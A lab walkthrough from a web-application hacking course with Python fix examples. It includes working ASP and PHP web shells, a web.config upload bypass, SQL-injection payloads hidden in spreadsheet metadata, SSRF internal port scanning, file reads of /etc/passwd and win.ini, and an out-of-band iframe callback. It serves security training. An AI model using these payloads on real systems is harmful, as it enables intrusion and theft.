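Why the mutation works, as an added illustration in Python (this is not the lab's Node.js server code): a resolver that copies every argument onto the stored user is the mass-assignment defect the walkthrough exploits, and the hardened version only writes self-service fields. The token function stands in for the JWT that is issued at login, which is why Step 8 logs out and back in before the new role appears. The resolver names, field list and user record below are assumptions.

```python
# Added illustration in Python; the lab's server is not this code.
# `ctx` is the request context holding the authenticated user's stored record.

ALLOWED_SELF_UPDATE = {"firstname", "lastname", "mobile", "address"}


class Forbidden(Exception):
    """Raised when a client tries to write a field it is not allowed to."""


def update_user_vulnerable(ctx, args):
    """Copies every argument onto the caller's record (mass assignment): because the
    schema exposes salary and isAdmin as arguments, a normal user promotes itself."""
    user = ctx["user"]
    for key, value in args.items():
        user[key] = value
    return user


def update_user_hardened(ctx, args):
    """Writes only self-service fields. Privileged fields are rejected outright rather
    than silently dropped, so the attempt is visible in application logs."""
    user = ctx["user"]
    rejected = set(args) - ALLOWED_SELF_UPDATE
    if rejected:
        raise Forbidden(f"user {user['id']} tried to set {sorted(rejected)}")
    for key in ALLOWED_SELF_UPDATE & set(args):
        user[key] = args[key]
    return user


def issue_token(user):
    """Stand-in for the JWT the application returns at login. Claims come from the
    stored record, which is why Step 8 logs out and in to see the new role."""
    return {"sub": user["id"], "isAdmin": bool(user["isAdmin"])}


# The mutation arguments from Step 7, as a dict.
STEP7_ARGS = {"firstname": "user", "lastname": "updated", "mobile": "0000000000",
              "address": "AWH", "salary": "2500", "isAdmin": True}


def demo(args=STEP7_ARGS):
    """Run the same mutation against both resolvers on a fresh non-admin record (an
    assumed record, not a lab account). Returns (role after the vulnerable resolver,
    hardened outcome, role after the hardened resolver)."""
    victim = {"id": 7, "firstname": "a", "lastname": "b", "mobile": "", "address": "",
              "salary": "100", "isAdmin": False}
    vulnerable_ctx = {"user": dict(victim)}
    vulnerable_role = issue_token(update_user_vulnerable(vulnerable_ctx, args))["isAdmin"]
    hardened_ctx = {"user": dict(victim)}
    try:
        update_user_hardened(hardened_ctx, args)
        outcome = "accepted"
    except Forbidden:
        outcome = "rejected"
    return vulnerable_role, outcome, hardened_ctx["user"]["isAdmin"]


if __name__ == "__main__":
    print(demo())
```

The same split applies to salary: an attribute that only payroll or an administrator should change belongs in a separate, separately authorised mutation, not in the self-service updateUser.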


Module: Tricky file uploads

Bypassing File Validations #1

Challenge URL: http://topup.webhacklab.com/Account/Profile

• Identify the upload functionality and abuse it to upload a web shell.

Solution:
Step 1: Log in to the topup application and navigate to the profile update page, which allows the user
to upload a profile picture.

Upload an image and the application displays it in your profile.


Step 2: Since the application is built on ASP.NET (IIS), try to upload a classic ASP file (test.asp) with the
following content, a minimal command-execution page:

<%
' Helper objects: a shell for running commands and a network object for host/user info
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' Read the command first so the form field below can echo it back
szCMD = Request("cmd")
' Runs a command through WScript.Shell and returns everything it wrote to stdout
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objShell.Exec(theCommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
End Function
%>

<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
</p>
<% ' Only run something when a command was supplied; note the space after /c
If szCMD <> "" Then
Response.Write(getCommandOutput("cmd /c " & szCMD))
End If %>
</PRE>
<br>
</BODY>
</HTML>


The application does not accept the asp file, as shown below:


Step 3: Try a different extension: upload a file named web.config with the content below. The application
accepts it. Refresh the Profile page, right-click the profile image and choose 'Copy Image Location' to obtain
the URL of the uploaded file. The handler declared in the file maps *.config to asp.dll and removes the
request-filtering rules that normally hide web.config, so requesting that URL executes the ASP code that
follows the XML. Add the 'cmd' parameter to the URL with the command you wish to execute and the page
displays its output.

Note: the published form of this trick places the ASP block inside an XML comment (<!-- ... -->) so that the
file remains well-formed XML; if IIS answers with a configuration error because of the trailing ASP code,
use that variant (the ASP code must then contain no '--' or '-->' sequences).

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule"
scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified"
requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>

<%
' Helper objects: a shell for running commands and a network object for host/user info
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' Read the command first so the form field below can echo it back
szCMD = Request("cmd")
' Runs a command through WScript.Shell and returns everything it wrote to stdout
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objShell.Exec(theCommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
End Function
%>

<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
</p>
<% ' Only run something when a command was supplied; note the space after /c
If szCMD <> "" Then
Response.Write(getCommandOutput("cmd /c " & szCMD))
End If %>
</PRE>
<br>
</BODY>
</HTML>


Step 4: Shell is uploaded and accessible.

Step 5: Execute the command “whoami” and check the output.


Bypassing File Validations #2

Challenge URL: http://shop.webhacklab.com/feedback.php

• Bypass the file validation checks to upload a web shell (userX.fileextension) and
execute commands on the host.

Solution:
Step 1: Navigate to the feedback functionality of the shopping application, which allows uploading
files. The functionality asks the user to upload an image file only. Upload an image and note the path at
which it is served. Try to upload a file with a non-image extension (e.g. php); the application shows the
message "Only jpg/jpeg and png files are allowed", as shown below:


Step 2: To bypass this client-side restriction, upload an image file with extension jpg/jpeg or png and
intercept the request. In the intercepted request change the value of the filename from image.png to
testX.php, also change the content of the image to php content:

<html>
<head>
<title>PHP Sample</title>
</head>
<body>
<?php echo '<p>Hello World</p>'; ?>
</body>
</html>

Step 3: The response shows that the php file was uploaded:


Step 4: Try to navigate to the uploaded 'testX.php' file. The file is not present on the server,
suggesting there is a server-side restriction as well. Repeating the method from Step 2, try
alternative PHP extensions such as php3, php4, php5, pht and phtml:

Step 5: Now try to access the uploaded files with the alternative extensions. You will notice that
the PHTML file exists and is executed by the server (the page renders 'Hello World'), as shown below:

http://shop.webhacklab.com/images/feedback/testX.phtml
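An added example (not the course's code and not either application's upload handler) that contrasts the kind of check both challenges defeat with a hardened one. The blocklist validator refuses only the extensions the developer thought of, so testX.phtml and web.config pass; the allowlist validator requires an allowed extension, a matching file signature and a one-dot filename, and ignores the multipart Content-Type. The file bodies are constructed; the extension list is the one tried in Step 4.

```python
import os
import re

# Real file signatures (PNG 8 bytes, JPEG 3 bytes); sample bodies below are constructed.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
ALLOWED_TYPES = {".jpg": JPEG_MAGIC, ".jpeg": JPEG_MAGIC, ".png": PNG_MAGIC}

# Extensions tried in Step 4 once the plain .php upload is refused.
BYPASS_EXTENSIONS = ["php", "php3", "php4", "php5", "pht", "phtml"]


def candidate_names(stem):
    """Filenames to submit one by one in the intercepted multipart request."""
    return [f"{stem}.{ext}" for ext in BYPASS_EXTENSIONS]


def validate_blocklist(filename):
    """The check both challenges defeat: refuse only the extensions the developer
    thought of. testX.phtml and web.config both pass."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in {".php", ".asp", ".aspx", ".jsp"}


_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z]{3,4}")


def validate_allowlist(filename, content):
    """Hardened check: no path components, exactly one dot (stops shell.php.png,
    web.config and .htaccess), extension from an allowlist, and the body must start
    with that type's signature. The multipart Content-Type header is never consulted
    because the client chooses it."""
    if filename != os.path.basename(filename) or not _SAFE_NAME.fullmatch(filename):
        return False
    magic = ALLOWED_TYPES.get(os.path.splitext(filename)[1].lower())
    return magic is not None and content.startswith(magic)


def stored_name(filename, token):
    """Store under a server-chosen name (token is assumed to be random); only the
    validated, lower-cased extension survives from the client's filename."""
    return token + os.path.splitext(filename)[1].lower()


if __name__ == "__main__":
    for name in ["testX.php", "testX.phtml", "web.config", "photo.png"]:
        print(name, "blocklist:", validate_blocklist(name),
              "allowlist:", validate_allowlist(name, PNG_MAGIC + b"\x00" * 8))
```

Storing uploads outside the web root, or in a location where the web server executes nothing, is the complement to this check: validation limits what gets written, the storage location limits what a mistake costs.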


Step 6: Now try to upload a web shell as a phtml file, with the following content:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Try to execute a command by accessing the web shell through the URL

http://shop.webhacklab.com/images/feedback/testX.phtml?cmd=pwd

This fails, suggesting the function 'system' might be blocked (typically via PHP's disable_functions).

Try the other PHP functions that can execute commands (passthru, shell_exec, exec, system, proc_open),
uploading each variant with the 'phtml' extension, and identify which of them execute. Using the
identified function 'proc_open', create a web shell named userX.phtml and upload it with the 'phtml'
extension. The command defaults to 'ls -l' and can be overridden with the 'cmd' parameter:

<?php
// Run a command with proc_open and stream its stdout and stderr back to the browser
$cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : 'ls -l';
$descr = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
$pipes = array();
$process = proc_open($cmd, $descr, $pipes);
if (is_resource($process))
{
    while ($f = fgets($pipes[1]))
    {
        echo "-pipe 1--->";
        echo $f;
    }
    fclose($pipes[1]);
    while ($f = fgets($pipes[2]))
    {
        echo "-pipe 2--->";
        echo $f;
    }
    fclose($pipes[2]);
    proc_close($process);
}
?>


Step 7: Access the uploaded userX.phtml file; the output of the command 'ls -l' is displayed on the
page:


SQLi via File Metadata

Challenge URL: http://reimbursement.webhacklab.com/Expense/Add

• Identify and exploit SQL Injection via file metadata properties to retrieve the current
database user and database name.

Solution:
Step 1: Sign in to the application and navigate to 'Expense' tab, click on 'Sample File' link and it will
download the 'SampleData.xls' as shown in the figure:


Step 2: Open the file with 'OpenOffice' and navigate to the 'File->Properties' as shown in the figure:


Step 3: Modify the 'Title' property, enter the payload below (a marker string followed by a single
quote) and click on the 'OK' button as shown in the figure:

Payload:

SQLi'

Step 4: Save the file and select 'Keep Current Format' option as shown in the figure:


Step 5: Navigate to 'Expense -> Add' and click on 'Browse' button and upload the file that was
modified in above step as shown in the figure:

Step 6: Observe Burp Request in which the payload was passed as shown in the figure:


Step 7: The application responds with a database error, which means the 'Title' property is
concatenated into a SQL statement and is vulnerable to SQL Injection, as shown in the figure:

Step 8: In order to exploit further and to fetch the username, insert the following payload in 'Title'
field as shown in the figure:

Payload:

SQLi',(SELECT user_name()))--


Step 9: Upload the modified file from the above step as shown in the figure:

Step 10: The payload gets successfully executed and the server responds with 'File Uploaded
Successfully!!' message as shown in figure:


Step 11: Now to view expense details, Navigate to 'Expense -> View' as shown in figure:

Step 12: Username value is stored in the 'FileName' column as shown in the figure:


Step 13: To fetch the database name, modify the payload as shown in the figure:

Payload:

SQLi',(SELECT DB_NAME()))--

Step 14: Repeat Step 9 to Step 12 to retrieve the database name, which is again stored in the
'FileName' column, as shown in the figure:
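To show what the Title payload does to the INSERT, here is an added example (not the reimbursement application's code) in Python with SQLite as a stand-in for SQL Server: sqlite_version() takes the place of user_name() and DB_NAME(), and the table and column names are assumptions modelled on the 'Title' and 'FileName' columns seen in Steps 8 and 12. The concatenating insert reproduces the error from Step 7 for the probe payload and lands the subquery's result in FileName; the parameterised insert stores the payload as a literal.

```python
import sqlite3

# The walkthrough targets SQL Server (user_name(), DB_NAME()); this stand-in uses SQLite so
# it runs anywhere, with sqlite_version() as the value to exfiltrate. Table and column names
# are assumptions modelled on the 'Title' and 'FileName' columns seen in Steps 8 and 12.
PROBE_PAYLOAD = "SQLi'"
EXTRACT_PAYLOAD = "SQLi',(SELECT sqlite_version()))--"
SAMPLE_FILENAME = "SampleData.xls"

LAST_ROW = "SELECT Title, FileName FROM Expenses ORDER BY Id DESC LIMIT 1"


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Expenses (Id INTEGER PRIMARY KEY, Title TEXT, FileName TEXT)")
    return conn


def rendered_statement(title, filename):
    """The statement an application builds when it concatenates document properties.
    With EXTRACT_PAYLOAD the quote closes Title, the subquery becomes the FileName
    value, the extra ')' ends VALUES and '--' comments out the rest of the statement."""
    return f"INSERT INTO Expenses (Title, FileName) VALUES ('{title}', '{filename}')"


def insert_vulnerable(conn, title, filename):
    """Execute the concatenated statement. Returns the stored (Title, FileName) row, or
    ('ERROR', message) when the statement breaks, which is what Step 7 observes."""
    try:
        conn.execute(rendered_statement(title, filename))
    except sqlite3.Error as exc:
        return ("ERROR", str(exc))
    return conn.execute(LAST_ROW).fetchone()


def insert_parameterised(conn, title, filename):
    """The fix: bound parameters, so the payload is stored as a literal string."""
    conn.execute("INSERT INTO Expenses (Title, FileName) VALUES (?, ?)", (title, filename))
    return conn.execute(LAST_ROW).fetchone()


if __name__ == "__main__":
    db = fresh_db()
    print(rendered_statement(EXTRACT_PAYLOAD, SAMPLE_FILENAME))
    print(insert_vulnerable(db, PROBE_PAYLOAD, SAMPLE_FILENAME))
    print(insert_vulnerable(db, EXTRACT_PAYLOAD, SAMPLE_FILENAME))
    print(insert_parameterised(db, EXTRACT_PAYLOAD, SAMPLE_FILENAME))
```

The lesson carries over to any value read out of an uploaded document: author, subject, EXIF fields and spreadsheet cell contents are attacker input just as much as a form field, and only parameterised statements keep them out of the SQL grammar.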


Module: Server Side Request Forgery (SSRF)

SSRF To Check Open Ports and Fetch File

Challenge URL: http://shop.webhacklab.com/products.php

• Utilizing SSRF, extract the contents of the internal file "/etc/passwd".

• Identify the ports open on the host "http://192.168.200.10/".

Solution:
Step 1: Navigate to the “Products” functionality of the application “NotSoSecure Sports Shop”:


Step 2: Notice that the application displays an external image by fetching it through the parameter
“imgurl”:

Step 3: Observe the same HTTP request from Burp Repeater:


Step 4: Provide "http://localhost" in the "imgurl" parameter and observe that the application
displays the index page of localhost, confirming that the server fetches whatever URL it is given:

Step 5: To scan the internal network we could guess or brute-force internal IP ranges, but since the same
parameter can also retrieve local files, first try to learn the internal IP from "file:///etc/hosts":


Step 6: Try the retrieved internal IP "192.168.200.10". Provide "http://192.168.200.10" in the
"imgurl" parameter and observe that the application displays the same index page as for localhost:

Step 7: To perform host discovery on a specific port, include the port in the URL:
"http://192.168.200.10:80"


Step 8: Try different IP and port combinations and observe the response time, highlighted in the
figure; an address with nothing behind it behaves differently from one that refuses or accepts the
connection:

http://192.168.200.100:80

Step 9: To perform automated internal network scanning, we can use Burp Intruder and select the
last octet of IP address:


Step 10: In Burp Intruder, select the payload type "Numbers" and set the number range from 0 to
255 with a step of 1:

Step 11: Sort the result table by "Response received" or "Length". Six other IPs responded quickly
(400-650 ms) compared to the normal response (3200-4200 ms); the slow baseline is what addresses with
nothing listening produce. The figure shows the HTTP request for IP 192.168.200.110, which responded
in 429 milliseconds:


Step 12: We can observe the HTTP response of above request for IP 192.168.200.110 on port 80:


Step 13: The column "Response received" was sorted in ascending order, but the descending order must be
checked too. The figure shows the HTTP request for IP "192.168.200.120", which took more than 60000
milliseconds: a host that holds the connection open is as much a sign of life as one that answers
quickly. Both signals together give the list of live internal hosts:


Step 14: To automate service enumeration across the network, use Burp Intruder with two payload
positions, the last octet of the IP address and the port. Because every port must be tried against
every host, select "Cluster bomb" as the attack type:

Step 15: In Burp Intruder, set the payload for the first position to the list of last octets:


Step 16: In Burp Intruder, set the payload for the second position to the list of ports/services to
enumerate for the IPs from the previous step:

Step 17: CAUTION: host and service discovery is being performed through the web application, so a small
mistake (a large payload set, many threads) turns into thousands of requests against the target and may
get the activity noticed or the application degraded. Use a single thread and throttle the requests:


Step 18: Sort the result table by "Length" or "Response received". Six other services returned
larger response bodies (167-11500 bytes) than the normal request (151 bytes). The figure shows the
HTTP request for IP 192.168.200.12 on port 80 (HTTP), which responded with 11476 bytes.


Step 19: Comparing "Length" for each port/service, five other services show variations in "Length".
This is a demo application and the analysis here is restricted to "Length" only, but the results
should also be compared on "Response received", since a service that answers with an error of the
same size can still stand out by timing.


Step 20: Comparing "Length" or "Response received" for each port/service, two more services (HTTP on
port 8080) show variations in "Length".
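Reading the Intruder tables by eye does not scale to 256 hosts times a port list. The added Python snippet below (it is not part of the course) encodes the two signals used in Steps 11 to 20: it builds the cluster-bomb target set and flags results whose timing or body length deviates from the median, separating "fast" (closed port or quick answer), "slow" (connection held open) and "length" (a different body, usually real content). The result rows are constructed and only resemble the lab's figures.

```python
from dataclasses import dataclass
from statistics import median


@dataclass
class Probe:
    ip: str
    port: int
    status: int
    length: int      # response body size in bytes (Intruder's "Length" column)
    elapsed_ms: int  # Intruder's "Response received" column


# Constructed results (not the lab's real table): unreachable addresses take ~3.5 s and
# return a 151-byte error page; live hosts either answer fast or hold the connection.
SAMPLE_RESULTS = [
    Probe("192.168.200.10", 80, 200, 11476, 429),
    Probe("192.168.200.11", 80, 200, 151, 3412),
    Probe("192.168.200.12", 8080, 200, 2310, 503),
    Probe("192.168.200.13", 80, 200, 151, 3990),
    Probe("192.168.200.14", 80, 200, 151, 3350),
    Probe("192.168.200.15", 80, 200, 151, 4120),
    Probe("192.168.200.16", 80, 200, 151, 3600),
    Probe("192.168.200.110", 80, 200, 151, 450),
    Probe("192.168.200.120", 80, 200, 151, 61000),
]


def targets(prefix, last_octets, ports):
    """Cluster-bomb payload set: every last octet combined with every port."""
    return [f"http://{prefix}.{octet}:{port}" for octet in last_octets for port in ports]


def find_outliers(results, time_ratio=2.0, len_tolerance=16):
    """Flag probes that deviate from the median timing or body length.
    'fast': closed port or quick answer (host up); 'slow': connection held open
    (host up); 'length': a different body, usually content from a listening service."""
    med_time = median(r.elapsed_ms for r in results)
    med_len = median(r.length for r in results)
    flagged = {}
    for r in results:
        reasons = []
        if r.elapsed_ms * time_ratio < med_time:
            reasons.append("fast")
        elif r.elapsed_ms > med_time * time_ratio:
            reasons.append("slow")
        if abs(r.length - med_len) > len_tolerance:
            reasons.append("length")
        if reasons:
            flagged[f"{r.ip}:{r.port}"] = tuple(reasons)
    return flagged


def live_hosts(results):
    """Distinct IPs that produced any outlier signal."""
    return sorted({key.rsplit(":", 1)[0] for key in find_outliers(results)})


if __name__ == "__main__":
    print(len(targets("192.168.200", range(256), [80, 8080])), "requests queued")
    for target, why in find_outliers(SAMPLE_RESULTS).items():
        print(target, why)
```

The median baseline only works when most addresses in the range are empty, which is the usual case for a /24; on a densely populated range, compare against a known-dead address instead.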


Step 21: The results can be matched against an "Nmap" scan run from a host with direct access to the
internal range, as shown in the figure below (this cross-check is only possible in the lab; in a real
engagement the SSRF results are all you have):

root@Kali:~# nmap -F 192.168.200.0/24 -sT


Step 22: The same parameter also accepts local paths, so a directory-traversal payload fetches the
internal file "/etc/passwd":

../../../../../../../etc/passwd


Step 23: Fetch the intern file "/etc/passwd" from the host through the file URI scheme:

http://shop.webhacklab.com/imagehandler.php?imgurl=file:///etc/passwd

Step 24: Fetch application source code from the host through the same scheme:

http://shop.webhacklab.com/imagehandler.php?imgurl=file:///var/www/html/admin.php


SSRF via PDF Generation

Challenge URL: http://topup.webhacklab.com/Account/Profile

• Utilise PDF export injection to confirm SSRF using an OOB channel.

• Retrieve the content of the internal file "win.ini".

Solution:
Step 1: Login to the topup application using your account and visit user account profile page. You
can update the account information using this page:

Step 2: To identify SSRF in the above input fields, OOB calls can be triggered with
<iframe src='http://192.168.4.X:8000'/> (X being the last octet of your Kali VM's address). Inject the
payload in the "billing address" field and generate the PDF to see how the server handles it.


Step 3: Start an HTTP server on your Kali VM to log incoming requests:

python3 -m http.server

Now make a top-up transaction, which will create a PDF invoice for the transaction details with the
help of user profile data.

Step 4: The python http.server log shows requests arriving from the server, which proves the PDF
generator renders the injected HTML and fetches remote resources: the "Name" and "Billing Address"
fields are vulnerable to SSRF.

Note: each time you test a different input field, generate a new invoice PDF through a top-up transaction to
obtain the HTTP log output.
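The Note above says each field must be retested separately; giving every field its own callback path avoids that, because one invoice then tells you which fields rendered. The added Python below (not part of the course) generates a per-field iframe payload, the file-read form used later, and parses the python3 -m http.server log to attribute each hit. The log lines are constructed and the callback host is the walkthrough's placeholder.

```python
import re

# Listener details from the walkthrough; X is the placeholder for your Kali VM's last octet.
CALLBACK_HOST = "192.168.4.X"
CALLBACK_PORT = 8000

# Log line format written by `python3 -m http.server` (BaseHTTPRequestHandler.log_message).
LOG_LINE = re.compile(
    r'^(?P<src>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) /(?P<path>[^ "?]*)[^"]*" (?P<code>\d{3})'
)

# Constructed log lines, not captured from the lab listener.
SAMPLE_LOG = """\
192.168.200.50 - - [12/Mar/2021 10:15:02] "GET /name HTTP/1.1" 404 -
192.168.200.50 - - [12/Mar/2021 10:15:02] "GET /billing HTTP/1.1" 404 -
192.168.200.50 - - [12/Mar/2021 10:15:03] "GET /favicon.ico HTTP/1.1" 404 -
"""


def oob_payload(field, host=CALLBACK_HOST, port=CALLBACK_PORT):
    """iframe pointing at a per-field path so the listener log attributes each hit."""
    return f"<iframe src='http://{host}:{port}/{field}'></iframe>"


def local_file_payload(path=r"C:\Windows\win.ini"):
    """The file-read form used in Step 6, once the OOB hit has confirmed rendering."""
    return f"<iframe src='file:////{path}'></iframe>"


def fields_that_fired(log_text, injected_fields):
    """Return {field: source IP} for every injected field whose path appeared in the log."""
    hits = {}
    for line in log_text.splitlines():
        match = LOG_LINE.match(line)
        if match and match.group("path") in injected_fields:
            hits[match.group("path")] = match.group("src")
    return hits


if __name__ == "__main__":
    for field in ("name", "billing", "city"):
        print(field, "->", oob_payload(field))
    print(fields_that_fired(SAMPLE_LOG, {"name", "billing", "city"}))
```

The source IP in the log is worth keeping: it is the egress address of the PDF renderer, which may differ from the web server's public address and tells you where the file-read step will execute.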

Step 5: The application runs on IIS 8.5 and ASP.NET, so use Windows-specific paths to read local content
from the web server.


Step 6: The previous step confirms the vulnerability in the "Name" and "Billing Address" fields. Place a
simple file-read payload into one of them; here it has been set in the "Billing Address" field:

<iframe src='file:////C:\Windows\win.ini'></iframe>

Step 7: Using top-up option of the homepage, you need to proceed with a top-up and complete the
transaction. After completion of the successful transaction there will be a payment invoice created
and available in “My Orders” section. While generating the invoice, it fetched the transaction details
along with the profile information available with our payload.


Step 8: Navigate to the "My Orders" page, find the recent order for your transaction and click on the
Download option. The downloaded PDF renders the iframe and contains the content of the Windows win.ini
file.

END OF PART - 3
